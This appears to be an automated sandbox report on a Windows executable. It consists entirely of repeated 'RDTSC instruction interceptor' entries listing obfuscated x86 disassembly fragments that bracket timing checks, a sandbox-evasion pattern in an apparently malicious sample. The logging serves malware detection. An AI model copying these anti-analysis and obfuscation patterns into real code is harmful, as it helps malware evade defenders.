Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C42F5B second address: C42FEA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885D5FB126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 431AE77Ah 0x00000011 jmp 00007F885D5FB135h 0x00000016 push 00000003h 0x00000018 add dword ptr [ebp+122D2272h], edx 0x0000001e push 00000000h 0x00000020 jmp 00007F885D5FB131h 0x00000025 push 00000003h 0x00000027 mov si, 6DD9h 0x0000002b add dword ptr [ebp+122D1FC6h], esi 0x00000031 push 4E75EDADh 0x00000036 jmp 00007F885D5FB12Eh 0x0000003b add dword ptr [esp], 718A1253h 0x00000042 call 00007F885D5FB133h 0x00000047 pop esi 0x00000048 lea ebx, dword ptr [ebp+12454BE4h] 0x0000004e movzx ecx, di 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jc 00007F885D5FB126h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43109 second address: C4313D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F885C786DF6h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F885C786DECh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4313D second address: C4315A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F885D5FB12Ch 0x00000008 jc 00007F885D5FB126h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F885D5FB126h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4315A second address: C431AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885C786DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jbe 00007F885C786DE6h 0x00000011 pop edi 0x00000012 popad 0x00000013 pop eax 0x00000014 mov edi, dword ptr [ebp+122D1CEFh] 0x0000001a lea ebx, dword ptr [ebp+12454BEFh] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F885C786DE8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov edi, 1FA18771h 0x0000003f and cx, 8B87h 0x00000044 xchg eax, ebx 0x00000045 pushad 0x00000046 jl 00007F885C786DECh 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C542F0 second address: C5430A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885D5FB130h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5430A second address: C54317 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F885C786DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61CD4 second address: C61D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F885D5FB126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F885D5FB13Fh 0x00000012 jnc 00007F885D5FB126h 0x00000018 jmp 00007F885D5FB133h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61D08 second address: C61D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61D0C second address: C61D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6231D second address: C62321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C628B6 second address: C628C0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885D5FB126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C628C0 second address: C62904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jg 00007F885C786DEAh 0x0000000e jno 00007F885C786DECh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F885C786DEEh 0x0000001b jmp 00007F885C786DF6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63410 second address: C6343C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F885D5FB138h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F885D5FB140h 0x00000011 jc 00007F885D5FB13Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638AB second address: C638B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638B3 second address: C638B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638B7 second address: C638DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885C786DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F885C786DE6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638DF second address: C638E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A253 second address: C6A259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A259 second address: C6A25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2DBAA second address: C2DBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F885C786DF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2DBC7 second address: C2DBD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F885D5FB126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2DBD1 second address: C2DBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C580 second address: C6C59D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F885CB96136h 0x0000000a jmp 00007F885CB96143h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C703B0 second address: C703B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FA00 second address: C6FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push edx 0x00000008 jno 00007F885CB96136h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FF7D second address: C6FFA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F885CCA3F0Ch 0x0000000c jc 00007F885CCA3F06h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F885CCA3F16h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FFA7 second address: C6FFAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FFAB second address: C6FFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70109 second address: C7010E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7010E second address: C7012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F885CCA3F13h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7012C second address: C70144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96144h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70B11 second address: C70B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7116F second address: C71176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71250 second address: C71254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71850 second address: C7186D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885CB96136h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F885CB96141h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7186D second address: C718CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b mov esi, 0DB0DDAEh 0x00000010 call 00007F885CCA3F0Fh 0x00000015 mov edi, dword ptr [ebp+122D2B5Ch] 0x0000001b pop esi 0x0000001c nop 0x0000001d push ecx 0x0000001e jp 00007F885CCA3F17h 0x00000024 jmp 00007F885CCA3F11h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e jmp 00007F885CCA3F0Bh 0x00000033 pop edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71E3D second address: C71E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F885CB9613Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72337 second address: C7233C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7233C second address: C723C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jbe 00007F885CB9613Ch 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F885CB96138h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov di, E38Fh 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F885CB96138h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c jmp 00007F885CB96148h 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 js 00007F885CB96138h 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d jp 00007F885CB96136h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72D61 second address: C72D80 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F885CCA3F13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72D80 second address: C72D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73CB8 second address: C73CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73CBE second address: C73CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C748B5 second address: C7492F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F885CCA3F0Ch 0x00000008 jg 00007F885CCA3F06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jnc 00007F885CCA3F1Eh 0x00000018 push edi 0x00000019 jmp 00007F885CCA3F12h 0x0000001e pop edi 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F885CCA3F08h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b movzx esi, dx 0x0000003e push 00000000h 0x00000040 cld 0x00000041 push 00000000h 0x00000043 clc 0x00000044 push eax 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7462F second address: C74645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F885CB96140h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74645 second address: C74656 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F885CCA3F06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C753C2 second address: C7542D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b stc 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F885CB96138h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 add dword ptr [ebp+122DBB52h], esi 0x0000002e push 00000000h 0x00000030 call 00007F885CB96140h 0x00000035 mov edi, dword ptr [ebp+122D2B10h] 0x0000003b pop esi 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F885CB96144h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75D48 second address: C75D4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C770A4 second address: C770AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C770AF second address: C770B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C050 second address: C7C06A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885CB96146h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B0EB second address: C7B0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F885CCA3F14h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0CF second address: C7D0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0DA second address: C7D0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0E3 second address: C7D0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0E7 second address: C7D0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D2E5 second address: C7D2EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F08C second address: C7F096 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CCA3F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D2EC second address: C7D38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F885CB9613Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F885CB96138h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push edx 0x00000030 call 00007F885CB9613Fh 0x00000035 jne 00007F885CB96136h 0x0000003b pop edi 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 or dword ptr [ebp+122D2074h], ecx 0x0000004a mov eax, dword ptr [ebp+122D035Dh] 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F885CB96138h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a add ebx, 37E7580Bh 0x00000070 push FFFFFFFFh 0x00000072 mov edi, dword ptr [ebp+122D2DC4h] 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b js 00007F885CB96138h 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D38B second address: C7D391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80F41 second address: C80F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96147h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8024E second address: C80252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80F5D second address: C80F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885CB9613Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81F86 second address: C81F90 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F885CCA3F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86052 second address: C86057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8322A second address: C83230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C842D5 second address: C842DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861E6 second address: C861EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83230 second address: C83234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C870D3 second address: C870D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C842DB second address: C842E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861EA second address: C861FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C852E7 second address: C852ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861FF second address: C86209 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F885CCA3F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C852ED second address: C852F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880AA second address: C880AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880AE second address: C880B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C862B9 second address: C862D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880B2 second address: C880B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882A0 second address: C882A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882A4 second address: C882AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2E4 second address: C8A2E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882AA second address: C882AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26F20 second address: C26F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C26F24 second address: C26F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F885CB96136h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C26F32 second address: C26F48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F885CCA3F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 ja 00007F885CCA3F06h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C26F48 second address: C26F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F885CB96136h 0x00000010 jmp 00007F885CB9613Dh 0x00000015 rdtsc
